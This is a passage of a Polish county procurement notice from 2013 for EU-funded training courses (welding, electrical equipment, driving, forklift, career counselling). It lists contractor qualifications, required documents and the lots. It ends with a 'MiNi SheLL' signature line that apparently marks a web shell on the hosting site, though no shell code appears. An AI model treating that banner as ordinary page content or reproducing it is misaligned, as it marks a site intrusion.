Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia jak 
i wykazu podwykonawców uczestniczących w realizacji zamówienia. 
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożony dokument/y.
Dla części V zamówienia. 
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia oraz przedstawi Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia oraz zakres wykonywanych przez nią czynności i informacją 
o podstawie dysponowania tą osobą.
Prawidłowe wykonanie zamówienia przez wykonawcę jest możliwe m.in. pod warunkiem dysponowania przez niego osobami posiadającymi niezbędne kwalifikacje i doświadczenie umożliwiające przeprowadzenie szkolenia zgodnie z wymogami zamawiającego. Dlatego na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawca zobowiązany jest wykazać, że dysponuje minimum 2 osobami, które posiadają następujące uprawnienia:
-         ukończone studia magisterskie w zakresie doradztwa zawodowego oraz przygotowanie pedagogiczne lub 
-         ukończone studia magisterskie na dowolnym kierunku i ukończone studia podyplomowe w zakresie doradztwa zawodowego oraz przygotowanie pedagogiczne, 
tj. kwalifikacje o których mowa w paragrafie 22 ust. 1 rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. 2009 nr 50 poz. 400), lub jest doradcą zawodowym lub doradcą zawodowym I stopnia lub doradcą zawodowym II stopnia w rozumieniu art. 94 ustawy z dnia 20 kwietnia 2004 roku 
o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz.U. 2008 Nr 69 poz. 415 z późn. zm.).
a także posiadają doświadczenie w przeprowadzeniu minimum 2 usług równoważnych 
z zajęciami będącymi przedmiotem oferty, przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert.
Zrealizowane usługi zostaną uznane za równoważne pod względem przedmiotowym z usługą będącą przedmiotem oferty, jeżeli ujmować będą min. 2 z 3 wskazanych poniżej form wsparcia, które są przedmiotem V części zamówienia:
-         indywidualne doradztwo zawodowe dla uczniów szkół ponadgimnazjalnych poruszające problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy, a także inne tematy wynikające ze szczególnych potrzeb uczestnika / uczestniczki.
- grupowe doradztwo zawodowe dla uczniów szkół ponadgimnazjalnych (warsztaty) poruszające problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy.
-  konferencje dla maturzystów / wykłady dla uczniów szkół ponadgimnazjalnych.
oraz pod względem tematycznym będą w 70% zgodne z programem usługi będącej przedmiotem zamówienia. W takich okolicznościach Zamawiający wymaga aby do wykazu usług zrealizowanych załączyć dodatkowo pełny program zrealizowanej usługi. Zamawiający zastrzega sobie prawo do żądania pełnej dokumentacji z wykazanych usług, jeżeli poweźmie wątpliwości do wykazanych usług (dzienniki zajęć, kopie wydanych zaświadczeń, listy obecności, itp.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I, II, III i IV zamówienia. 
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia oraz przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz informacją 
o podstawie dysponowania tym osobami.
Prawidłowe wykonanie zamówienia przez wykonawcę jest możliwe m.in. pod warunkiem dysponowania przez niego osobami posiadającymi niezbędne kwalifikacje i doświadczenie umożliwiające przeprowadzenie szkolenia zgodnie z wymogami zamawiającego. Dlatego na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawca zobowiązany jest wykazać, że dysponuje minimum 1 osobą, posiadającą uprawnienia do prowadzenia szkoleń/kursów/zajęć w odniesieniu do kursu/ szkolenia którego dotyczy oferta, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
a także posiadają doświadczenie w przeprowadzeniu minimum 2 szkoleń/kursów/zajęć równoważnych z kursem/szkoleniem/zajęciami będącymi przedmiotem oferty, przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert.
Spełnienie przedmiotowego warunku udziału w postępowaniu dotyczy każdej części zamówienia.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia jak 
i wykazu podwykonawców uczestniczących w realizacji zamówienia. 
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożony dokument/y.
Dla części V zamówienia. 
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia oraz przedstawi Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia oraz zakres wykonywanych przez nią czynności i informacją 
o podstawie dysponowania tą osobą.
Prawidłowe wykonanie zamówienia przez wykonawcę jest możliwe m.in. pod warunkiem dysponowania przez niego osobami posiadającymi niezbędne kwalifikacje i doświadczenie umożliwiające przeprowadzenie szkolenia zgodnie z wymogami zamawiającego. Dlatego na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawca zobowiązany jest wykazać, że dysponuje minimum 2 osobami, które posiadają następujące uprawnienia:
-         ukończone studia magisterskie w zakresie doradztwa zawodowego oraz przygotowanie pedagogiczne lub 
-         ukończone studia magisterskie na dowolnym kierunku i ukończone studia podyplomowe w zakresie doradztwa zawodowego oraz przygotowanie pedagogiczne, 
tj. kwalifikacje o których mowa w paragrafie 22 ust. 1 rozporządzenia ministra edukacji narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. 2009 nr 50 poz. 400), lub jest doradcą zawodowym lub doradcą zawodowym I stopnia lub doradcą zawodowym II stopnia w rozumieniu art. 94 ustawy z dnia 20 kwietnia 2004 roku 
o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz.U. 2008 Nr 69 poz. 415 z późn. zm.).
a także posiadają doświadczenie w przeprowadzeniu minimum 2 usług równoważnych 
z zajęciami będącymi przedmiotem oferty, przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert.
Zrealizowane usługi zostaną uznane za równoważne pod względem przedmiotowym z usługą będącą przedmiotem oferty, jeżeli ujmować będą min. 2 z 3 wskazanych poniżej form wsparcia, które są przedmiotem V części zamówienia:
-         indywidualne doradztwo zawodowe dla uczniów szkół ponadgimnazjalnych poruszające problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy, a także inne tematy wynikające ze szczególnych potrzeb uczestnika / uczestniczki.
- grupowe doradztwo zawodowe dla uczniów szkół ponadgimnazjalnych (warsztaty) poruszające problematykę z zakresu poruszania się po rynku pracy (m.in. zasady pisania CV i listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej, w tym  gry symulacyjne), podstaw przedsiębiorczości, stereotypów płci, zasad równości, równouprawnienia i przykładów dyskryminacji na rynku pracy.
-  konferencje dla maturzystów / wykłady dla uczniów szkół ponadgimnazjalnych.
oraz pod względem tematycznym będą w 70% zgodne z programem usługi będącej przedmiotem zamówienia. W takich okolicznościach Zamawiający wymaga aby do wykazu usług zrealizowanych załączyć dodatkowo pełny program zrealizowanej usługi. Zamawiający zastrzega sobie prawo do żądania pełnej dokumentacji z wykazanych usług, jeżeli poweźmie wątpliwości do wykazanych usług (dzienniki zajęć, kopie wydanych zaświadczeń, listy obecności, itp.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści złożonej oferty, na podstawie której dokonano wyboru Wykonawcy:
1. w stosunku do osób - zmiany osób reprezentujących na skutek zmian organizacyjnych,
2. zmiany danych adresowych - w przypadku zmiany siedziby,
3. w zakresie zmiany terminów realizacji poszczególnych elementów zamówienia,  w przypadku:
- konieczności prowadzenia dodatkowej rekrutacji wynikającej ze zbyt małego zainteresowania uczniów mechanizmami wsparcia,
- konieczności wprowadzenia zmian w harmonogramie, wynikających z przyczyn organizacyjnych,
- gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego terminowego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Gnieźnie, ul. Jana Pawła II 9/10, 62-200 Gniezno, I piętro, pokój 1.13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 10:30, miejsce: Starostwo Powiatowe w Gnieźnie, ul. Jana Pawła II 9/10, 62-200 Gniezno, parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający niniejszym zamówieniem realizuje projekt Wyższe kwalifikacje - lepszy start współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs spawania metodą MAG i TIG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - w okresie realizacji projektu przeprowadzone zostaną 4 edycje kursu (I w okresie od III - VI 2013 r, II w okresie od IX-XII 2013 r, III w okresie od I - VI 2014 r, IV w okresie od IX - XII 2014 r); 
- łącznie we wszystkich edycjach kursu udział weźmie 48 uczniów/uczennic, po 12 w każdej edycji kursu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs obsługi i eksploatacji urządzeń elektroenergetycznych do 1 KV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - łącznie w 3 edycjach kursu udział weźmie 30 osób;
- w okresie realizacji projektu zorganizowane zostaną 3 edycje kursu (I w okresie od III - VI 2013 r, II w okresie od I - VI 2014 r, III w okresie od IX - XII 2014 r);.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs nauki jazdy kat. B, Kurs nauki jazdy kat. B+E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs nauki jazdy kat. B: w okresie realizacji projektu zrealizowane zostaną 4 edycje kursu łącznie dla 30 uczniów/ uczennic (I w okresie od III - VI 2013 r, II w okresie od IX-XII 2013 r, III w okresie od 
I - VI 2014 r, IV w okresie od IX - XII 2014 r); w każdej edycji udział weźmie 6-8 osób; Łącznie w 4 edycjach udział weźmie 30 osób;
Kurs nauki jazdy kat. B+E:w okresie realizacji projektu zrealizowane zostaną 2 edycje kursu (I w okresie od IX-XII 2013 r, II w okresie od I - VI 2014 r); Łącznie w 2 edycjach udział weźmie 10 osób;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs obsługi wózka jezdniowego z napędem silnikowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - zajęcia będą odbywać się w podziale na grupy o liczebności około 10 osób; 
w każdej edycji kursu udział weźmie 1 grupa; nie można łączyć grup, ani wprowadzać na zajęcia dodatkowych osób niebędących uczniami wskazanymi przez Zamawiającego; 
- zrealizowanych zostanie 6 edycji kursu (I w okresie od III - VI 2013 r, II w okresie od IX-XII 2013 r, III i IV w okresie od I - VI 2014 r, V i VI w okresie od IX - XII 2014 r), 
w każdej udział weźmie 10 uczestników/uczestniczek;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - indywidualne zajęcia doradztwa zawodowego - po 2 godziny dla każdego ze 100 uczniów/uczennic,
- warsztaty doradztwa zawodowego - łącznie 40 warsztatów (po 3 godziny każdy) dla 10 grup uczniów/uczennic,
- 4 wykłady kierunkowe - W każdym roku realizacji projektu odbędą się 2 wykłady kierunkowe (tj. 2 w roku 2013 i 2 w roku 2014). Każdy wykład kierunkowy trwać będzie 2 godziny,
- 2 konferencje dla maturzystów - W każdym roku realizacji projektu odbędzie się 
1 konferencja dla maturzystów (tj. 1 w roku 2013 i 1 w roku 2014). Każda konferencja trwać będzie 4 godziny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com